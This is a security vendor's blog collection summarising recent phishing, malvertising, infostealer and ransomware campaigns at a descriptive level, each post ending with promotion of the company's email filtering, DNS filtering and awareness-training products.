SocGholish is a malware downloader that provides initial access to a victim’s network. The malware has been used to deliver a wide range of payloads, including AZORult, Gootloader, NetSupport, and Dridex. SocGholish has also previously been used to deliver DoppelPaymer ransomware, and now RansomHub ransomware. In the case of RansomHub, the group deploys Python-based backdoor components for RansomHub affiliates to use for initial access.
Preventing SocGholish infections is critical to preventing RansomHub ransomware attacks; however, prevention requires a defense-in-depth approach. Traffic to the compromised websites can come from emails that include embedded hyperlinks, malvertising, SEO poisoning, and links to compromised websites are also delivered to users via Google Alerts. The webpages that host the fake browser updates filter traffic, blocking access by sandboxes, which can make detection difficult.
The best approach is to use an advanced anti-spam software such as SpamTitan to block malicious emails. In the last quarterly round of testing at VirusBulletin, SpamTitan, a cloud-based antispam service from TitanHQ, ranked #1 for malware detection, phishing detection and spam blocking with a 0% false positive rate, and in the February 2025 tests, achieved a perfect score blocking 100% of malware, phishing, and spam emails. The high detection rate is due to extensive front-end tests, email sandboxing, and machine learning.
A web filter adds an important layer of protection by scanning websites for malicious content and blocking access to known malicious websites. The WebTitan DNS filter is fed extensive threat intelligence to block access to known compromised webpages, can filter websites by category, and can be configured to block downloads of executable files from the Internet. Security awareness training is vital for creating a human firewall. Employees should be informed about the risks of interacting with security warnings on the Internet, and taught how to identify phishing attempts and be instructed on security best practices. The SafeTitan security awareness training platform and phishing simulator platform make creating and automating training courses and phishing simulations a quick and easy process.
by titanadmin | Mar 31, 2025 | Phishing & Email Spam
One of the ways that cybercriminals are bypassing traditional email security solutions is to use QR codes rather than embedded hyperlinks in their phishing emails. QR codes are increasingly used by businesses to drive traffic to web pages, as consumers do not need to go through the process of typing a URL into their browser. The QR code can simply be scanned with a smartphone camera, the URL will be recognized, and the web resource can be visited with a single tap of the finger.
Spam filtering services will detect links in emails, check them against blacklists of known malicious websites, and will often follow the links to find the destination URL. If the website is malicious, the email will not be delivered to the user’s inbox. By using a QR code rather than a hyperlink, there is an increased chance that the message will be delivered, as many anti-spam software solutions are incapable of reading QR codes.
One such campaign has recently been identified that warns the recipient that they must review and update their tax records. The email has the subject, “urgent reminder,” and claims to have been sent by the Tax Services Team. The email has a PDF file attachment and advises the recipient that a review of their tax records must be completed by April 16, 2025, to avoid potential penalties. Tax season is well underway and annual tax returns need to be submitted by April 15, 2025, so the deadline for a response is plausible.
Rather than include a link, the PDF file includes a QR code, which the user is told they should scan with their mobile device to access the secure tax portal, where they must log in, review their tax information, and confirm it is up to date.
If the QR code is scanned and the link followed, the user must first pass a CAPTCHA test, after which they are presented with a Microsoft login prompt and asked to enter their password. The form is already populated with the user’s email address to make it appear that the user is known or has visited the site before, adding an air of legitimacy to the scam. If the password is entered, it will be captured and used to hijack the user’s Microsoft account. After entering the password, the user is told “We could not find an account with that username. Try another account,” which may allow the attacker to steal credentials for another account.
QR code phishing forces users onto a mobile device, which typically has weaker security than a desktop computer or laptop, plus only the domain name can usually be viewed rather than the full URL, which helps to make the link seem legitimate. Phishers also often use open redirects on legitimate websites to make their links appear authentic and hide the final destination URL.
With QR code phishing scams on the rise, it is important to raise awareness of the threat through your security awareness training program. Employees should be warned that QR codes are commonly used by threat actors, and never to follow links encoded in QR codes that arrive via email. It is also recommended to use a phishing simulator to assess whether the workforce is susceptible to QR code phishing attempts. The SafeTitan security awareness training platform allows businesses to easily conduct phishing simulations on the workforce to gauge susceptibility to phishing threats. The phishing simulator will generate relevant training content immediately if a phishing test is failed, ensuring targeted training content is delivered immediately, when it is likely to be most effective at correcting behavior.
Technical defenses should also be implemented. An advanced spam filtering service should be used that is capable of identifying QR codes and following and assessing URLs for phishing content and malware. The outbound spam filter of SpamTitan is capable of following QR codes and assessing content, and in recent tests, correctly identified 100% of phishing attempts. SpamTitan also includes email sandboxing for in-depth analysis of email attachments. A DNS security solution is also recommended for in-depth analysis of URLs for malicious content to provide an extra layer of protection against phishing and malware.
by titanadmin | Mar 30, 2025 | Phishing & Email Spam
A new phishing-as-a-service (PhaaS) platform has been identified that highlights the sophistication of phishing attacks, and how even cybercriminals with limited skill sets can conduct extremely effective phishing campaigns.
One of the problems when conducting phishing campaigns is ensuring the phishing emails are convincing. Phishing has traditionally been a numbers game, where large volumes of messages are sent in the knowledge that a small number of individuals will be tricked into responding. Those individuals may simply be busy and respond without taking the time to carefully consider what they are being asked, or individuals with poor security awareness. Targeted phishing attempts, termed spear phishing, involve research and are tailored to individuals or small numbers of individuals, and because of the targeting, there is a much higher response rate. The trade-off is that these campaigns involve considerable time and effort.
The new PhaaS platform allows a threat actor to tailor the content to display a fake login page relevant to the individual receiving the message, while still sending a large volume of phishing emails. The phishing kit allows individuals to be tricked by displaying a login prompt that impersonates any of 114 brands in around a dozen different languages, with the content displayed tailored to each individual. The threat actor configures the phishing campaign, sends out phishing emails via the PhaaS kit, and the link in the email directs the recipient to a phishing webpage. The next stage is where the targeting occurs. The threat actor queries the email domain DNS MX records (DNS over HTTPS) obtained from Cloudflare or Google to identify the user’s email service provider. The phishing page is then dynamically displayed based on the results of that query, and if no response is received, the phishing page defaults to Roundcube.
DNS queries are fast, so the query and response occur in a fraction of a second, as is the case when a DNS query is sent to identify the IP address of a webpage when browsing the internet. As such, there is only a very small delay, often unnoticeable to the user, before the content is loaded. The result is that if the user’s email service provider is Gmail, they will be presented with a Gmail login prompt, and if they use Microsoft Outlook, they will be presented with a Microsoft login prompt. If the user responds and enters their login credentials, they are captured and sent to the collection server, and the user is redirected to the real login page for that service, most likely unaware that they have been phished. The phishing campaign was identified by InfoBlox, which identified thousands of phishing emails sent via the kit. While the kit appears to have been first used in 2020, since then the number of brands being impersonated has increased considerably, with support also provided to target users in several languages.
The phishing kit demonstrates the sophistication of phishing attacks and how threat actors are increasing the effectiveness of their campaigns. Businesses should respond to the evolving threat landscape by adopting a defense-in-depth approach that includes a DNS filtering solution such as WebTitan, advanced spam filtering software such as SpamTitan, and ongoing security awareness training and phishing simulations for the workforce to raise awareness of threats and reduce susceptibility to phishing attempts, using a solution such as SafeTitan.
by titanadmin | Mar 29, 2025 | Security Awareness
Businesses can implement the most advanced anti-spam software, email sandboxing, multifactor authentication, anti-phishing solutions, and endpoint security software and will be well protected against email-based attacks, but even with layered security provided by multiple security solutions, it will not be possible to block every threat and malicious emails will land in inboxes, albeit in much smaller numbers. All it takes is for one employee to respond to a phishing threat for an attacker to gain the foothold they need for a much more extensive compromise, and even one compromised email account can result in a large and costly data breach.
As email filtering services have improved, cybercriminals have changed their tactics and come up with novel ways to reach employees and trick them with social engineering. Voice phishing (vishing) and SMS-based phishing (smishing) have increased significantly, often combining initial contact via email or SMS with a number to call. The scammer then tricks the employee into installing remote access software and granting them remote access to their device.
Residents of several cities in the United States are currently being targeted in smishing attacks, with the text messages warning them about unpaid parking tickets. The texts appear to have been sent by the city’s parking violation department and advise the recipient about an unpaid parking invoice or fine. As with many phishing attempts, there is a sense of urgency – The fine will increase by $35 per day unless the initial fine is paid. A link is supplied in the text for the user to pay the fine, using a Google.com open redirect to send the user to the phishing site. Since the google.com domain is trusted, the messages are often delivered without the link being disabled.
To combat these forms of phishing, businesses need to ensure their employees are aware of the threats and that phishing can occur with any form of communication, not just email, and that means providing security awareness training to the workforce. Unfortunately, simply providing training once or twice a year does not necessarily have a significant impact on reducing susceptibility to phishing attempts. While a once-a-year training session for the workforce was once the best practice, it is no longer sufficient due to the rapidly changing threat landscape, the volume of threats, and the use of AI tools for creating new social engineering methods and flawless phishing communications.
Traditionally, businesses would conduct security awareness training presentations or annual training courses where employees would be provided with in-depth information about the types of threats they should be aware of, how to identify those threats, and what to do if a potential threat is encountered. The problem with this approach is that a lot of the information will not be retained and will likely be forgotten within days of the training session. At best, understanding will improve a little, but this approach will not drive the positive behavioral changes the training session is intended to achieve.
Further, the threat landscape is constantly changing, with new attack methods constantly being developed by threat actors. To be effective, training needs to be an ongoing process, with the workforce kept up to date on novel threats and the changing tactics of cybercriminals, with training reinforced regularly.
The best approach is to use a computer-based training course with short modules that can be completed on an ongoing basis. Completing a couple of short training modules each week will be much more effective at changing employee behavior than an annual training session. Shorter and more enjoyable training content will keep employees engaged and should help them to retain the information and apply the training after the training session has been completed.
Quizzes are useful after a training course to check whether the content has been understood, and training should be followed by phishing simulations to give employees practice at recognizing phishing attempts. If a phishing simulation is failed, it should trigger further training, ideally immediately.
With the SafeTitan security awareness training platform it is easy to create and automate ongoing training courses, tailored to the employee’s role to keep it relevant. Training courses can be created from a huge library of training modules, with each training module lasting no more than 10 minutes to keep the employee engaged. Training courses can be easily updated in response to new threats, as new training modules are regularly added to the library in response to the latest threat intelligence.
The platform also includes a phishing simulator, with internal phishing campaigns easily created and automated. The SafeTitan platform can also generate an immediate training module in response to a failed phishing simulation or a detected risky behavior, ensuring relevant training is delivered at the point where it is likely to have the greatest effect at changing behavior.
Phishing is the most common way that cybercriminals steal data and gain a foothold in a network, and attacks are on the rise, so it is important to ensure that your defenses are up to scratch. TitanHQ can help by providing cutting-edge anti-phishing solutions and providing a highly effective training platform to improve your human defenses.
Give the TitanHQ team a call today to find out more about implementing a new security awareness training program with SafeTitan and improving your technical defenses with cutting-edge email and web security solutions.
by titanadmin | Mar 27, 2025 | Internet Security
A massive malvertising campaign has been identified that has infected nearly 1 million devices with malware since December 2024. Malvertising is the term used for advertisements that redirect users to a malicious website where credentials are stolen (phishing) or malware is downloaded. The malicious adverts are often added to legitimate ad networks, with the adverts pushed out to websites that are part of the ad network. As such, malicious adverts can be displayed on many legitimate websites which makes the adverts appear legitimate.
This campaign targets individuals who use illegal streaming websites. Malvertising redirectors have been added to the streaming sites that redirect visitors to GitHub, Discord, or Dropbox via an intermediary website. If the advertisement is clicked, the user will arrive on GitHub via a sophisticated redirection chain involving four or five redirects, with the first redirector embedded within an iframe on the streaming website.
The first stage payload is hosted on GitHub, where most users are redirected, although the first stage has also been identified on Discord and Dropbox. The first stage is used to drop second-stage files, which are used for system discovery and data exfiltration over HTTP. Data collected by the second stage files includes information about the device, such as the operating system, memory size, user paths, screen resolution, and graphics information.
After exfiltrating that information, third stage payloads are delivered based on the information collected by the second-stage files. The third stage payloads establish a connection to the command-and-control (C2) server and exfiltrate sensitive data from the device, and lead to a fourth stage, an AutoIT binary that uses PowerShell to open files, facilitate data exfiltration, add exclusions to Microsoft Defender to prevent detection, drop a remote access Trojan, and identify installed security software and other applications.
The campaign has been attributed to a threat group tracked by Microsoft Threat Intelligence as Storm-0408. The group is known to conduct phishing campaigns, search engine optimization (SEO) poisoning, and malvertising to deliver remote action trojans and information stealers for data theft. Malware variants known to be delivered in the malvertising campaign include the commodity information-stealing malware variants, Lumma Stealer and Doenerium, and the remote access trojan, Net Support RAT. The attacks are indiscriminate, targeting users of illegal streaming services rather than specific industries, with victims including consumers and enterprise employees.
There are several steps that enterprises can take to protect against malvertising, one of the most effective being a web filtering solution. The WebTitan DNS filter can be used to prevent users from visiting certain categories of websites, such as streaming sites and other high-risk websites. Illegal streaming services often host malware, so blocking access can prevent malware infections and enterprises can reduce legal risk by stopping employees from illegally streaming pirated content on company IP addresses. WebTitan can also be configured to block downloads of certain file types from the Internet, such as executable files that are used to install malware. Blocking these file downloads can also help enterprises control shadow IT – software not authorized by the IT department.
Security awareness training should also be provided to the workforce to help eradicate risky practices and raise awareness of threats such as phishing, malvertising, and malware. TitanHQ’s security awareness training program, SafeTitan, makes it easy to create and update training courses for the workforce to teach security best practices to reduce susceptibility to the full range of cyber threats and conduct phishing simulations. Give the TitanHQ team a call today for more information on protecting against malware and other cyber threats, or take advantage of a free trial of TitanHQ’s cybersecurity solutions and see for yourself the difference they make and how easy they are to use.
by titanadmin | Mar 26, 2025 | Phishing & Email Spam, Security Awareness
Malware is often packaged with software solutions, where the user is given the software they are looking for, but the installer also silently delivers malware to their device. Since the desired product is installed, the user will be unaware that their device has been infected. Malware is often hidden in installers for pirated software or the associated keygen for obtaining the product key. All a threat actor has to do is convince a user to download and execute the installer.
One such campaign involves the use of online document converters, which are used to convert one file type to another. For example, these tools can be used to convert .docx files to .pdf files, create .pdf files from multiple .jpeg images, or convert one audio or video format to another. The Federal Bureau of Investigation (FBI) has been receiving an increasing number of complaints about malware infections from free document converters and download tools. The tool is delivered, but malware is also installed that provides the threat actor with remote access to the infected device, allowing them to steal sensitive data, encrypt files with ransomware, or use the infected device for other nefarious purposes. There are other risks associated with this scam. Cybercriminals in control of these tools are able to scrape sensitive information from the converted files, including passwords, cryptocurrency seeds, email addresses, banking information, and Social Security numbers. Any file uploaded to any online service risks a disclosure of sensitive information.
Traffic can be driven to these doctored or fake installers via links in emails, or malvertising and search engine poisoning. With malvertising and search engine poisoning, cybercriminals target key search terms, such as “free online file converter.” The URLs are made to appear legitimate, such as mimicking a genuine tool and transposing a couple of letters, using hyphenated domain names, or subdomains on an existing site. The site content often appears professional and can be difficult for web users to identify as malicious.
In addition to bundling malware with legitimate software, there are online versions of these tools. The user is instructed to upload the file they wish to convert, and the converted file is downloaded. There have been instances where the converted file is added to a zip file for download, but rather than the converted file, an executable file is delivered, such as a .js file. Attempting to open the file triggers the installation of malware such as a remote access trojan, keylogger, banking trojan, or malware downloader. The popular malware download Gootloader has been observed being delivered this way. A Gootloader infection often leads to the delivery of a variety of malware payloads such as banking trojans, information stealers, and post-exploitation tools such as Cobalt Strike beacons.
Due to the increasing use of these tactics, it is important to incorporate them into your security awareness training programs to make users aware of the risks of using free file conversion tools. Before any such tool is used, it is important to conduct research to make sure the tool provider is genuine, and to scan any downloaded installer or converted file with antivirus software. Busy employees who need to quickly convert a file into a different format can easily fall victim to these scams.
In addition to raising awareness of the threat, businesses should consider restricting the types of files that can be downloaded from the Internet. This is easy with WebTitan, a powerful DNS-based web filter that prevents access to malicious websites and blocks unauthorized file downloads from the Internet. WebTitan can be configured to prevent certain employees (non-IT staff, for instance) from downloading executable file types, thereby neutralizing the threat. In addition to serving as an extra layer of protection against malware, WebTitan can also help to curb shadow IT – software installations unknown to the IT department. While these software installations may not contain any malware, they can easily introduce risks and vulnerabilities that can be exploited by hackers.
Give the TitanHQ team a call today to find out more about WebTitan and how it can improve security at your business, and for more information on the SafeTitan security awareness training and phishing simulation platform. TitanHQ also offers antispam software and a Microsoft 365 anti-phishing solution for blocking phishing threats. In recent independent tests, the engine that powers these two solutions achieved top spot for malware, phishing, and spam blocking out of all tested solutions with a perfect 100% block rate in each category and a 0.0% false positive rate.
by titanadmin | Mar 26, 2025 | Phishing & Email Spam, Security Awareness, Spam Software
Phishing, and especially email phishing, is the most common attack vector used by cybercriminals and attacks continue to increase year after year. The latest data suggests that around 1.2% of all emails are malicious, which equates to around 3.4 billion malicious emails a day. Threat actors use email to distribute malware, drive traffic to malicious sites to harvest credentials and perform a wide range of scams, including business email compromise, the costliest type of cybercrime, often resulting in millions in losses.
While there are many ways that businesses can be attacked and many steps that can be taken to improve security, ensuring your defenses against email attacks are up to scratch is the best way of improving your security posture. Fortunately, TitanHQ has three easy-to-implement solutions that can greatly improve your defenses against the growing email and phishing threat, all of which are available on a free trial so you can put them to the test to see the difference they make.
Block More Threats with an Advanced Email Filtering Service
SpamTitan is an advanced spam filtering service that is quick and easy to implement, provides exceptional protection against all forms of email attacks, and does not require a degree in cybersecurity to use and maintain. The ease of use of the solution is one of the reasons the solution is popular with businesses from small mom-and-pop stores to large enterprises.
The SpamTitan cloud-based anti-spam service provides cutting-edge protection through a barrage of front-end tests, AI and machine learning-powered detection, twin antivirus engines, and email sandboxing. Suspicious files are sent to the sandbox to be safely detonated and subjected to in-depth behavioral analysis, helping to detect and block zero-day malware threats. In independent tests by VirusBulletin in Q3 2024, SpamTitan was rated in joint first place for detection, sole first place in Q4 2024 with a 100% malware catch rate, 100% phishing catch rate, and a 99.98% spam catch rate, and in February 2024, SpamTitan achieved a perfect score across the board, blocking all threats in the test.
Provide Effective Security Awareness Training to Your Workforce
Technical safeguards will block the vast majority of email threats, but it is inevitable that some threats will reach their intended targets. All it takes is for one employee to respond to a phishing email for a company to suffer a costly data breach or ransomware attack. It is vital that human defenses are strengthened by providing comprehensive security awareness training. The most effective training programs run continuously, with employees given training regularly throughout the year. Only through regular training will you be able to develop a security culture, where employees are constantly looking for potential threats and are conditioned to report suspicious emails to the security team.
The SafeTitan security awareness platform includes an extensive library of enjoyable and engaging training modules on all aspects of security, with each module lasting no longer than 10 minutes for maximum engagement. The platform makes it easy to create training programs for the workforce, tailored for different roles in the organization, and automate those programs so they run continuously throughout the year. Training should be reinforced using phishing simulations, which can be easily created and automated through the SafeTitan platform. When employees fail a phishing simulation, relevant training is generated in real-time to ensure it is delivered when it is likely to have the maximum effect on changing employee behavior.
Improve Microsoft 365 Security with PhishTitan
PhishTitan is an advanced cloud-based anti-phishing solution for Microsoft 365 powered by the same engine behind the award-winning SpamTitan anti-spam service. The solution has been developed to be integrated seamlessly with Microsoft 365 to augment Microsoft’s EOP and Defender protections and catch the threats that these solutions often miss to give true defense-in-depth security. Like SpamTitan, PhishTitan adds layers of analysis and machine learning models to provide cutting-edge protection against phishing. PhishTitan scans all internal and external emails, rewrites URLs to detect links to malicious sites, automatically blocks phishing links in emails to prevent clicks, and provides time-of-click protection by inspecting and evaluating URLs in real-time to detect changes to the destination URL after the emails have been delivered.
PhishTitan adds banners to emails from external sources, helping to combat spoofing and alerting the recipient to take extra care, and also incorporates protection against QR code phishing – quishing – which is growing in prevalence and capable of defeating many email security solutions. The platform also includes an auto-remediation feature, allowing administrators to rapidly remediate threats from users’ inboxes, including cross-tenant features for detection and response by MSPs. One of the main complaints from Microsoft 365 users is the number of phishing emails that bypass defenses; however, with the additional layers of protection provided by PhishTitan, businesses will be better protected against phishing threats.
If you want to improve your defenses against email threats, give the TitanHQ team a call or take advantage of a free trial of TitanHQ solutions to put them to the test in your own environment.
by titanadmin | Mar 19, 2025 | Industry News
TitanHQ has announced a new partnership with the Indian managed service provider Pace Infotech, which will now be providing TitanHQ’s security solutions to its 1,000+ customers in India. For more than 25 years, Pace Infotech has been providing professional and IT services to companies throughout India to help them achieve sustainability and growth. Pace Infotech provides a comprehensive range of cybersecurity services, including network security, endpoint security, data security, and compliance management.
The partnership with TitanHQ will see Pace Infotech expand its portfolio of cybersecurity solutions to better meet the needs of its customers, especially in the areas of email security and phishing protection, web security, and security awareness training, allowing the company to deliver a multi-layer security approach to protect its customers from the full range of cybersecurity threats including malware, ransomware, phishing, social engineering, business email compromise, spoofing and more.
TitanHQ’s product portfolio includes the multi-award-winning SpamTitan spam filtering service and the Microsoft 365 anti-phishing solution PhishTitan. The engine that powers both of those solutions provides unbeatable protection against phishing and malware threats. In VirusBulletin’s February 2025 tests, these solutions achieved a 100% phishing, malware, and spam catch rate with a 0% false positive rate, putting TitanHQ well on track for its 4th consecutive VBSpam+ certification. In the Q4 2024 tests, TitanHQ achieved top position out of all tested solutions with a 100% malware catch rate, 100% phishing catch rate, and a 99.98% spam catch rate, and TitanHQ was joint first in the Q3 2024 tests.
TitanHQ’s portfolio also includes the WebTitan DNS filter, which offers cutting-edge protection against web-based threats and allows users to carefully control the content that end users can access online. The solution adds a vital extra layer of protection against malware delivery and the web-based component of phishing attacks. Managed service providers that partner with TitanHQ can also add security awareness training and phishing simulations to their services through the SafeTitan training platform, email encryption with EncryptTitan, and email archiving with ArcTitan, helping them to deliver comprehensive cybersecurity packages to protect against an ever-evolving threat landscape. In addition, TitanHQ solutions have been developed from the ground up to meet the needs of MSPs, and are easy to implement and manage. If you are a managed service provider looking to better meet the needs of your clients, give the TitanHQ team a call today for more information on becoming a TitanHQ partner.
by titanadmin | Mar 18, 2025 | Network Security, Security Awareness
Ransomware attacks are continuing to increase despite recent law enforcement efforts targeting the most prolific ransomware groups. In 2024, there was a 15% increase in ransomware attacks according to the U.S. Cyber Threat Intelligence Integration Center, with around half of attacks conducted on entities in the United States. Critical infrastructure sectors are particularly at risk. Organizations in these sectors are extensively targeted as they tend to hold large volumes of sensitive and valuable data, and these organizations have a low tolerance for downtime, which makes it more likely that a ransom will be paid to ensure a quick recovery. This is especially true in healthcare, which is one of the most targeted critical infrastructure sectors.
Ransomware groups can gain initial access to victims’ networks in a variety of ways, such as exploiting unpatched vulnerabilities, using stolen credentials, and leveraging Remote Desktop Protocol; however, phishing is one of the most common initial access vectors, according to Deloitte. Phishing attacks are low-cost and easy to conduct. Teams of initial access brokers that specialize in phishing work with ransomware gangs and provide them with access to corporate devices. Social engineering techniques are used to trick employees into disclosing credentials or installing malware, with the user often unaware that they have given a threat actor access to their device.
There is a growing trend of using personal information in phishing emails to increase the likelihood of the recipient responding. The more personalized the email is, the easier it is to convince the recipient that the email is genuine. Given the number of data breaches now occurring, there is no shortage of sensitive data on the dark web that cybercriminals can use to make their phishing campaigns more effective, and with AI tools widely available, personalizing phishing emails has never been easier. AI is also extensively used in phishing to create plausible lures in perfect English, which can make it difficult to distinguish phishing emails from the genuine communications they impersonate.
With so many cyberattacks having phishing as the initial access vector, businesses need to ensure that they have effective email security. The core solution for blocking phishing attacks is a spam filtering service or anti-spam software. Since cybercriminals are using LLM tools to craft their phishing emails, corporate email filters also need to incorporate AI and machine learning tools to ensure these emails are detected. Machine learning is used to determine how emails deviate from the emails normally received by the business.
In order for an enterprise spam filter to be effective at blocking malware threats, email attachments must be subjected to behavioral analysis, rather than relying on signature-based detection using traditional anti-virus software. Threat actors are using AI to rapidly develop malware and alter existing malware variants to defeat signature-based detection mechanisms. You should therefore ensure your email security solution includes email sandboxing, where suspicious attachments are sent to be safely detonated and have their behavior inspected.
The SpamTitan cloud-based anti-spam service from TitanHQ incorporates these features to provide cutting-edge protection against phishing and malware threats. In independent tests at VirusBulletin in Q3 and Q4, 2024, the engine that powers SpamTitan was rated joint 1st (Q3) and 1st (Q4) due to the highly accurate detection rate. In both rounds of tests, SpamTitan blocked 100% of malware and 100% of phishing emails with a 0% false positive rate.
In addition to a spam filter, businesses need to ensure that their workforce is trained to recognize and avoid phishing threats. Regular training will help to develop a security culture and eradicate risky practices so that if a threat is encountered by an employee, it will be recognized and reported to the security team. Phishing simulation data from the SafeTitan security awareness training platform has shown that susceptibility to phishing emails can be reduced by up to 80% with regular security awareness training and phishing simulations. To find out more about how you can improve your defenses against phishing, malware, ransomware, and other cyber threats, give the TitanHQ team a call. All titanHQ solutions are available on a free trial to allow you to see for yourself the difference they make.
by titanadmin | Mar 15, 2025 | Phishing & Email Spam
Individuals in the hospitality sector are being targeted in a sophisticated phishing scam that uses the ClickFix phishing technique. The ClickFix campaign has been active since at least December 2024 and is being conducted on targets in North America, Europe, Oceania, South and Southeast Asia.
The phishing emails impersonate booking.com and target staff at hotels, guest houses, and other accommodation providers that are likely to work with booking.com. A wide range of emails have been associated with this ClickFix campaign, including emails that appear to have been sent by prospective guests about the accommodation asking for advice, notifications from booking.com about complaints from guests about previous stays, requesting feedback on the guests’ comments, and security notifications from booking.com about suspicious login attempts.
While the lures are varied, they all use social engineering techniques to trick the recipient into clicking a link, which directs the user to a web page with a fake CAPTCHA overlayed on a visible background that appears to be the Booking.com website. The link may be added to the message body using anchor text to make it appear that the link is legitimate, or in some of the emails, the link is added to a PDF file attachment in an effort to bypass email security solutions.
When the user attempts to complete the CAPTCHA prompt, they are advised of an error and are told they must use a keyboard shortcut (Windows key + R), then CTRL + V to paste a command into the Windows Run window, and press Enter to execute that command. The command copied to the clipboard will download and launch malicious code through mshta.exe, a legitimate Windows process. If the command is executed, it will lead to the delivery of malware such as AsyncRAT, VenomRAT, NetSupport RAT, Danabot, XWorm, and Lumma Stealer. Victims may get a cocktail of malware installed on their device.
The campaign is being run by a threat actor tracked by Microsoft Threat Intelligence as Storm-1865. Storm-1865 is a financially motivated threat actor that primarily engages in payment data theft and fraudulent charges to victims’ accounts. After achieving its aims, the group may sell access to victims’ devices to other threat actors. Previous campaigns have used similar techniques and have involved messages sent through vendor platforms such as travel agencies, e-commerce platforms, and email services such as Gmail and iCloud mail.
The ClickFix technique was first identified in October 2023 and has been adopted by several different threat actors including financially motivated cybercriminal groups and nation state actors from Russia and North Korea. The lures and malware may differ, but all use social engineering to trick the victim into running a command to fix a fictitious technical issue.
Businesses should ensure they have appropriate defenses to block phishing emails, as the ClickFix technique has proven to be highly effective. TitanHQ offers two solutions for blocking phishing attempts – the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365 users. The engine that powers both of these solutions was rated #1 out of all tested solutions in the Q4, 2024 tests by VirusBulletin, blocking 100% of phishing emails, 100% of malware, and 99.98% of spam emails. In the February 2025 tests, TitanHQ had a perfect score, blocking 100% of malware, phishing, and spam emails with a 0% false positive rate.
SpamTitan incorporates email sandboxing for behavioral analysis of emails and machine-learning algorithms to identify suspicious emails, ensuring an incredibly high detection rate. PhishTitan adds an additional layer of protection for Microsoft 365 accounts, augmenting Microsoft’s protections to identify and block the threats that Microsoft misses. Businesses should also ensure they provide security awareness training to the workforce and conduct phishing simulations of the ClickFix phishing technique. TitanHQ can help in this area with the SafeTitan security awareness training and phishing simulation platform. Call TitanHQ today for more information on phishing defense, or take advantage of the free trial of all of these solutions.
by titanadmin | Mar 4, 2025 | Phishing & Email Spam, Spam Software, Website Filtering
There has been a surge in infostealer malware infections, with detections up almost 60% from the previous year. Infostealers gather system information, stored files, and sensitive data and exfiltrate the information to their command and control server. Once installed, they can remain undetected for long periods of time, exfiltrating sensitive data such as usernames and passwords by logging keystrokes, with some variants capable of taking screenshots and capturing audio and video by taking control of the microphone and webcam.
The majority of infostealers are used to attack Windows systems; however, a new infostealer called FrigidStealer has been identified that is being used to target Mac users. FrigidStealer is capable of stealing saved cookies, password-related files in the Safari and Chrome browsers, and login credentials, along with cryptocurrency wallet credentials, Apple Notes containing passwords, documents, spreadsheets, text files, and other sensitive data from the user’s home directory. The gathered data is added to a compressed file in a hidden folder in the user’s home directory and is exfiltrated to its command and control server.
The threat actor behind the campaign distributes FrigidStealer under the guise of important web browser updates on compromised websites. The threat actor injects malicious JavaScript into the HTML of the webpage which generates a fake browser update notification to website visitors. The notifications warn the user that they must update their browser to continue to view the page, with the displayed notification tailored to the browser in use.
The notifications look professional, include the appropriate logos for either Google Chrome or Safari, and contain an update button that the user must click to proceed. Clicking the button will trigger the download of an installer (DMG file), which must be manually launched. The user is required to enter their password to get around macOS Gatekeeper protections. If the password is entered, the file is executed and FrigidStealer is delivered.
A similar campaign is being conducted targeting Windows users. The Windows campaign uses similar techniques, although it tricks the user into downloading and executing an MSI installer, which delivers one of two different info stealers, Lumma Stealer or DeerStealer. The threat actor is also targeting Android devices in a similar way, delivering an APK file that contains the Marcher banking Trojan.
With infostealer infections soaring, businesses need to make sure they have the right security solutions in place and should be providing regular security awareness training to the workforce. Employees should be instructed to never download browser updates when prompted to do so on websites or run any suggested commands on their devices, as the updates and commands are likely to be malicious.
A web filter is strongly recommended for controlling access to the Internet and blocking visits to malicious websites. The WebTitan DNS filter can used to protect users on or off the network and is constantly updated with threat intelligence on new malicious websites. If an attempt is made to visit a known malicious website, that attempt will be blocked. The web filter can also be configured to block file downloads from the internet by file type, allowing IT teams to prevent employees from downloading executable files.
While this is a web-based campaign, information stealers are commonly distributed in phishing emails, either through malicious attachments or embedded hyperlinks. TitanHQ’s SpamTitan cloud-based anti-spam service is a powerful AI-driven email security solution with email sandboxing and advanced threat detection capabilities. SpamTitan outperformed all other tested solutions in recent tests by VirusBulletin, blocking 100% of phishing emails and 100% of malware.
by titanadmin | Feb 28, 2025 | Security Awareness, Website Filtering
A China-based ransomware group, Silver Fox, that has primarily targeted individuals in China, Taiwan, and Hong Kong, has been expanding its attacks outside of those regions and is now conducting attacks more broadly on multiple industry sectors. Silver Fox uses ransomware in its attacks and is focused on file encryption, demanding payment to obtain the keys to decrypt files. While the group does engage in double extortion tactics, stealing data and threatening to leak that data if the ransom is not paid, data theft is limited. Highly sensitive data is not generally stolen.
Many ransomware groups breach networks and spend time moving laterally to infect the maximum number of devices possible and also spend time locating sensitive data to exfiltrate. It is often the data theft and threat of publication that is the main driver behind ransom payments, so much so that some ransomware groups have abandoned the file encryption element of their attacks. In contrast, Silver Fox is focused on quick attacks, often breaching networks and encrypting files on the same day. The group even abandons attacks if lateral movement is not possible or if strengthened security is encountered.
Silver Fox primarily gains initial access to victims’ networks by deploying a remote access Trojan called ValleyRAT. ValleyRAT was first identified in 2023 and is believed to be a malware tool developed by Silver Fox, and its function is to give Silver Fox remote access to networks. The group has extensively targeted individuals in accounting, finance, and sales since those employees are likely to have access to sensitive data that can be quickly and easily stolen.
ValleyRAT is delivered by multiple means, indicating Silver Fox is trying to infect as many users as possible. One of the main methods used for distribution is fake installers for popular software. For instance, the group has been observed using fake installers for EmEditor (a Windows text editor), DICOM software (for viewing medical images), and system drivers and utilities. The group has also been observed using a spoofed website offering the Google Chrome browser, which prompts the user to download a ZIP file containing a Setup.exe file, which installs ValleyRAT.
The methods used to drive traffic to these fake downloads are unclear, although traffic to the fake Google Chrome download site is thought to be generated through malvertising and SEO poisoning, where malicious adverts are displayed for key search terms related to Chrome and web browsers that redirect users to the drive-by download site. SEO poisoning may be used, where black hat SEO techniques are used to get web pages to appear in the search engine listings for key search terms. If the user is tricked into executing the fake installer, they will be infected with ValleyRAT and a ransomware attack will rapidly follow.
Since the group is focused on rapid attacks involving minimal effort, the best defense is to strengthen baseline security and make lateral movement difficult through network segmentation. To prevent ValleyRAT downloads, web security needs to be improved to block attempts by users to visit the malicious websites. A web filter is an ideal tool for blocking access, including redirects through malvertising and SEO poisoning. A web filter such as WebTitan can also be configured to block downloads of certain files from the Internet and restrict access to websites by category – software download sites for example. Ongoing (and regular) security awareness training is also vital to teach employees about the risk of downloading software from the Internet, raise awareness of phishing, and teach security best practices, adding an important human layer to your security defenses.
